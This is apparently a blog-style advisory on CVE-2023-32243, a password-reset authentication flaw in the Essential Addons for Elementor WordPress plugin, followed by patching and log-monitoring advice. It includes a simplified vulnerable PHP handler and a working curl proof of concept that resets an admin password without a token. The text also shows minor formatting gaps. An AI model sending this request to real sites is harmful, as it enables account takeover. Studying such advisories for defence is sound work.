CVE-2023-32243 - How Improper Authentication in Essential Addons for Elementor Lets Attackers Take Over WordPress Sites

Published: June 2024  
Vulnerability Type: Improper Authentication / Privilege Escalation  
Affected Plugin: WPDeveloper Essential Addons for Elementor  
Affected Versions: 5.4. up to 5.7.1 (inclusive)  
Patched Version: 5.7.2

TL;DR

A critical bug in the Essential Addons for Elementor WordPress plugin lets hackers easily escalate their privileges, possibly up to administrator, on any unpatched site running plugin versions 5.4. to 5.7.1. This problem arises from improper authentication in the password reset feature—meaning attackers can reset passwords for any user if they know the username or email. Patching to 5.7.2+ is essential.

What's Essential Addons for Elementor?

If you use Elementor, you probably know Essential Addons—it’s one of the most popular add-on packs, with over a million installs, giving site owners new widgets like post grids, sliders, and more. Unfortunately, popularity makes it a big target for hackers.

What is CVE-2023-32243?

CVE-2023-32243 highlights a critical improper authentication vulnerability. The bug exists in plugin versions 5.4. to 5.7.1, in code that handles user password resets. Normally, WordPress password reset flows confirm user identity by verifying unique tokens. This bug bypasses that check, letting anyone reset passwords for existing users.

This means:  
If an attacker knows anyone’s username (even the site admin!), they can change that user’s password and take over the account—no email required.

Original References and Sources

- Patchstack Security Advisory
- WPScan Vulnerability Details
- Plugin’s Official Changelog

The vulnerability lives in the following password reset handler (simplified for readability)

// vulnerable code in includes/Classes/eael-user-login.php

public function process_reset_password() {
    $user = get_user_by('login', $_POST['user_login']);
    if(!$user) {
        return ['error' => 'User not found!'];
    }
    // ... no token check!
    reset_password($user, $_POST['new_password']);
    return ['success' => 'Password reset successfully!'];
}

This code ONLY checks if the user exists, but does not confirm password reset tokens that WordPress normally sends by email. An attacker can simply POST directly to this handler with any username and a new password—overwriting any account credentials.

Proof-of-Concept (PoC) Exploit

Below you'll find a simple proof-of-concept using CURL. Just replace the target site and username.

curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php'; \
    -d 'action=eael_reset_password' \
    -d 'user_login=admin' \
    -d 'new_password=SuperSecure123!'

That’s it: if the site is running a vulnerable version, the admin’s password is now “SuperSecure123!”.

No email access or valid reset token needed.

- Works for all users (admins, editors, regular), as long as the username is known/guessed.

Update Essential Addons for Elementor immediately to 5.7.2 or later.

- Official download: wordpress.org/plugins/essential-addons-for-elementor/
2. Check user accounts for unauthorized changes. If you see unexpected password changes, investigate.
3. Monitor server logs for suspicious POST requests to /wp-admin/admin-ajax.php calling action=eael_reset_password.

Has This Been Exploited in the Wild?

Yes. According to both Patchstack and several major threat intelligence sources, real-world attacks began hours after public disclosure.

Conclusion

CVE-2023-32243 is a textbook case of how a small code mistake—skipping a token check—can lead to complete site takeover. If you run Elementor with Essential Addons, and haven’t patched, you are almost certainly being probed by bots right now.

Further Reading

- WordPress Password Reset Security: What Developers Should Know
- How to Secure Popular WordPress Plugins

Timeline

Published on: 05/12/2023 08:15:00 UTC
Last modified on: 05/23/2023 20:17:00 UTC